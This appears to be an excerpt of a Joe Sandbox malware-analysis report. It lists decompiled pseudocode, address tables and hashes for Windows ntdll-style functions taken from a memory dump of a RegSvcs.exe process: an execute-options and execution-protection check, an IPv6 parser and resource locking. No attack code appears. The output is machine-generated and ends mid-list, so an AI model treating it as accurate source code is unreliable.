				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x942088; // 0x77f10225
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00897F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E008B3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0086DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x944218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E008B3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00870D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E008B3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00878375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E008B3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E008DE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E008B3F92();
					_t38 = 1;
					L2:
					return E0086E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x00897f08
                                                0x00897f0f
                                                0x00897f12
                                                0x00897f1b
                                                0x00897f31
                                                0x008b3ead
                                                0x008b3eb4
                                                0x00000000
                                                0x00000000
                                                0x008b3eba
                                                0x008b3ecd
                                                0x008b3ed2
                                                0x008b3ee1
                                                0x008b3ee7
                                                0x008b3eec
                                                0x008b3f12
                                                0x008b3f18
                                                0x008b3f1a
                                                0x00000000
                                                0x00000000
                                                0x008b3f20
                                                0x008b3f26
                                                0x008b3f28
                                                0x00000000
                                                0x00000000
                                                0x008b3f2e
                                                0x008b3f30
                                                0x00000000
                                                0x00000000
                                                0x008b3f3a
                                                0x008b3f3b
                                                0x008b3f53
                                                0x008b3f64
                                                0x008b3f69
                                                0x008b3f6c
                                                0x008b3f6d
                                                0x008b3f6f
                                                0x008be304
                                                0x008be30f
                                                0x008be315
                                                0x008be31e
                                                0x008be321
                                                0x008be327
                                                0x008be329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008be32f
                                                0x008be32f
                                                0x008be337
                                                0x008be33a
                                                0x008be33b
                                                0x008be33d
                                                0x008be33f
                                                0x008be341
                                                0x008be341
                                                0x008be34e
                                                0x008be353
                                                0x008be358
                                                0x008be35d
                                                0x008be35f
                                                0x00000000
                                                0x00000000
                                                0x008be365
                                                0x008be365
                                                0x008be368
                                                0x008be36e
                                                0x00000000
                                                0x00000000
                                                0x008be374
                                                0x008be32f
                                                0x008b3f75
                                                0x008b3f7a
                                                0x008b3f7c
                                                0x008b3f7e
                                                0x008b3f86
                                                0x00897f39
                                                0x00897f47
                                                0x00897f47
                                                0x00897f37
                                                0x00897f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 008B3F12
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 008B3F4A
                                                • Execute=1, xrefs: 008B3F5E
                                                • ExecuteOptions, xrefs: 008B3F04
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 008BE2FB
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 008B3F75
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 008B3EC4
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 008BE345
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: c0fd2b85aadba14ded15c5cb1807c2427e7f426586bb59fecb0a2885a763d576
                                                • Instruction ID: 7fd946f57166d64559615e56e6942cf0d9d4011273126c42cb4cad9025a60785
                                                • Opcode Fuzzy Hash: c0fd2b85aadba14ded15c5cb1807c2427e7f426586bb59fecb0a2885a763d576
                                                • Instruction Fuzzy Hash: 8641C871A9061C7ADF20EA98DCC6FEA73BCFB54704F0405A9B505F6281EE70DB458B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008A0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E008A0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00878980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0086DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E008A0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E008A0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008A06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008A06BA(_t135, _t178) == 0 || E008A0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E008A0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E008A0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008A06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008A06BA(_t124, _t142) == 0 || E008A0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x008a0b21
                                                0x008a0b24
                                                0x008a0b27
                                                0x008a0b2a
                                                0x008a0b2d
                                                0x008a0b30
                                                0x008a0b33
                                                0x008a0b36
                                                0x008a0b39
                                                0x008a0b3e
                                                0x008a0c65
                                                0x008a0c68
                                                0x008a0c6a
                                                0x008a0c6f
                                                0x008ceb42
                                                0x00000000
                                                0x00000000
                                                0x008ceb48
                                                0x008ceb48
                                                0x008a0c75
                                                0x008a0c7a
                                                0x008ceb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008ceb5a
                                                0x008a0c80
                                                0x008a0c84
                                                0x008ceb98
                                                0x00000000
                                                0x00000000
                                                0x008ceba6
                                                0x008a0cb8
                                                0x008a0cba
                                                0x008a0cd3
                                                0x008a0cda
                                                0x008a0ce4
                                                0x008a0ce9
                                                0x00000000
                                                0x008a0cec
                                                0x008a0c8c
                                                0x008ceb63
                                                0x00000000
                                                0x00000000
                                                0x008ceb70
                                                0x008ceb75
                                                0x008ceb7d
                                                0x00000000
                                                0x00000000
                                                0x008ceb8c
                                                0x00000000
                                                0x008ceb8c
                                                0x008a0c96
                                                0x00000000
                                                0x00000000
                                                0x008a0ca2
                                                0x008a0cac
                                                0x008a0cb4
                                                0x00000000
                                                0x00000000
                                                0x008a0b44
                                                0x008a0b47
                                                0x008a0b49
                                                0x00000000
                                                0x00000000
                                                0x008a0b4f
                                                0x008a0b50
                                                0x00000000
                                                0x00000000
                                                0x008a0b56
                                                0x008a0b62
                                                0x008a0b7c
                                                0x008a0bac
                                                0x008a0a0f
                                                0x008ceaaa
                                                0x00000000
                                                0x008ceac4
                                                0x008ceac4
                                                0x008a0bd0
                                                0x008a0bd0
                                                0x008a0bd4
                                                0x008a0bd9
                                                0x00000000
                                                0x00000000
                                                0x008a0bdb
                                                0x008a0be0
                                                0x008ceb0e
                                                0x008a0a1a
                                                0x00000000
                                                0x008a0a1a
                                                0x008ceb1a
                                                0x008ceb1f
                                                0x008ceb27
                                                0x00000000
                                                0x00000000
                                                0x008ceb36
                                                0x00000000
                                                0x008ceb36
                                                0x008a0bea
                                                0x00000000
                                                0x00000000
                                                0x008a0bf6
                                                0x008a0c00
                                                0x008a0c03
                                                0x008a0c0b
                                                0x00000000
                                                0x008a0c0b
                                                0x008ceaaa
                                                0x00000000
                                                0x008a0a15
                                                0x008a0bb6
                                                0x00000000
                                                0x008a0bc6
                                                0x008a0bc6
                                                0x008a0bcb
                                                0x008a0c15
                                                0x00000000
                                                0x00000000
                                                0x008a0c1d
                                                0x008a0c20
                                                0x008a0c21
                                                0x008a0c24
                                                0x008a0c24
                                                0x008a0c26
                                                0x00000000
                                                0x008a0c26
                                                0x008a0bcd
                                                0x00000000
                                                0x008a0bcd
                                                0x008a0b89
                                                0x008a0b89
                                                0x008a0b90
                                                0x00000000
                                                0x00000000
                                                0x008a0b96
                                                0x00000000
                                                0x008a0b96
                                                0x008a0a04
                                                0x008a0a04
                                                0x008a0b9a
                                                0x008a0b9a
                                                0x008a0b9b
                                                0x008a0b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008a0ba5
                                                0x008a0ac7
                                                0x008a0aca
                                                0x008ceacf
                                                0x00000000
                                                0x008ceade
                                                0x008ceade
                                                0x008ceae3
                                                0x00000000
                                                0x00000000
                                                0x008ceaf3
                                                0x008ceaf6
                                                0x008ceaf7
                                                0x008ceafe
                                                0x008ceb01
                                                0x00000000
                                                0x008ceb01
                                                0x008ceacf
                                                0x008a0ad0
                                                0x008a0ad4
                                                0x00000000
                                                0x00000000
                                                0x008a0ada
                                                0x008a0ae6
                                                0x008a0c34
                                                0x00000000
                                                0x008a0c47
                                                0x008a0c49
                                                0x008a0c4a
                                                0x008a0c4e
                                                0x008a0c51
                                                0x008a0c54
                                                0x008a0c57
                                                0x008a0c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008a0c60
                                                0x008a0afb
                                                0x008a0afe
                                                0x008a0b02
                                                0x008a0b05
                                                0x008a0b08
                                                0x00000000
                                                0x008a0b08
                                                0x008a0ae6
                                                0x008a0b44
                                                0x008a09f8
                                                0x008a09f8
                                                0x008a09f9
                                                0x00000000
                                                0x00000000
                                                0x008ceaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: 19de6b3af400701749054c9bdea19d72e8d54145b246e95293bc6fe8f559e5fe
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: AFA18C71D0031AEFEB24CF68C8456BEB7B4FB06329F24856AD442E7A42D6349A41CF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008A0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 50%
                                                			E008A0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
									_push(_t144);
									_push(0);
									_t51 = E0085F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E008A4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E008B3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008E217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E008B3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E008A3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009401c0;
												_push(_t138);
												_push(0);
												_t58 = E0085F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E008A4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E008B3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E008B3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008E217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E008B3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E008A3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00885384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0085F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E008A3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0085F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E008A3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0085F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E008A3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00885329(_t110, _t138);
																_t69 = E008853A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                0x008a055a
                                                0x008a055d
                                                0x008a0563
                                                0x008a0566
                                                0x008a05d8
                                                0x008a05e2
                                                0x008a05e5
                                                0x00000000
                                                0x008a05e7
                                                0x008a05e7
                                                0x008a05ea
                                                0x008a05f3
                                                0x008a05f3
                                                0x008a0568
                                                0x008a0568
                                                0x008a0568
                                                0x008a0569
                                                0x008a0569
                                                0x008a0569
                                                0x008a056b
                                                0x00000000
                                                0x00000000
                                                0x008c217f
                                                0x008c2183
                                                0x008c225b
                                                0x008c225f
                                                0x008c2189
                                                0x008c218c
                                                0x008c218f
                                                0x008c2194
                                                0x008c2199
                                                0x008c219d
                                                0x008c21a0
                                                0x008c21a2
                                                0x008c21ce
                                                0x008c21ce
                                                0x008c21ce
                                                0x008c21d0
                                                0x008c21d6
                                                0x008c21de
                                                0x008c21e2
                                                0x008c21e8
                                                0x008c21e9
                                                0x008c21ec
                                                0x008c21f1
                                                0x008c21f6
                                                0x00000000
                                                0x00000000
                                                0x008c21f8
                                                0x008c21fb
                                                0x008c2206
                                                0x008c220b
                                                0x008c220c
                                                0x008c2217
                                                0x008c2226
                                                0x008c222b
                                                0x008c222c
                                                0x008c222f
                                                0x008c2232
                                                0x008c2235
                                                0x008c2235
                                                0x008c223a
                                                0x008c223f
                                                0x008c2241
                                                0x008c2243
                                                0x008c2248
                                                0x008c2248
                                                0x008c224d
                                                0x008c224f
                                                0x008c2262
                                                0x008c2263
                                                0x008c2268
                                                0x008c2269
                                                0x008c2269
                                                0x008c2269
                                                0x008c226d
                                                0x00000000
                                                0x00000000
                                                0x008c2276
                                                0x008c2279
                                                0x008c227e
                                                0x008c2283
                                                0x008c2287
                                                0x008c228a
                                                0x008c228d
                                                0x008c228f
                                                0x008c22bc
                                                0x008c22bc
                                                0x008c22bc
                                                0x008c22be
                                                0x008c22c4
                                                0x008c22cc
                                                0x008c22d0
                                                0x008c22d6
                                                0x008c22d7
                                                0x008c22da
                                                0x008c22df
                                                0x008c22e4
                                                0x00000000
                                                0x00000000
                                                0x008c22e6
                                                0x008c22e9
                                                0x008c22f4
                                                0x008c22f9
                                                0x008c22fa
                                                0x008c2305
                                                0x008c2314
                                                0x008c2319
                                                0x008c231a
                                                0x008c231d
                                                0x008c2320
                                                0x008c2323
                                                0x008c2323
                                                0x008c2328
                                                0x008c232d
                                                0x008c232f
                                                0x008c2331
                                                0x008c2336
                                                0x008c2336
                                                0x008c233b
                                                0x008c233d
                                                0x008c2350
                                                0x008c2351
                                                0x008c2356
                                                0x008c2359
                                                0x008c2359
                                                0x008c235b
                                                0x008c235d
                                                0x00885367
                                                0x0088536b
                                                0x00885372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008c2363
                                                0x008c2363
                                                0x008c2369
                                                0x008c236a
                                                0x008c236c
                                                0x008c2371
                                                0x008c2373
                                                0x00000000
                                                0x008c2379
                                                0x008c2379
                                                0x008c237a
                                                0x008c237f
                                                0x008c237f
                                                0x008c2385
                                                0x008c2386
                                                0x008c2389
                                                0x008c238e
                                                0x008c2390
                                                0x00885378
                                                0x0088537c
                                                0x008c2396
                                                0x008c2396
                                                0x008c2397
                                                0x008c239c
                                                0x008c23a2
                                                0x008c23a3
                                                0x008c23a6
                                                0x008c23ab
                                                0x008c23ad
                                                0x00000000
                                                0x008c23b3
                                                0x008c23b3
                                                0x008c23b4
                                                0x008c23b9
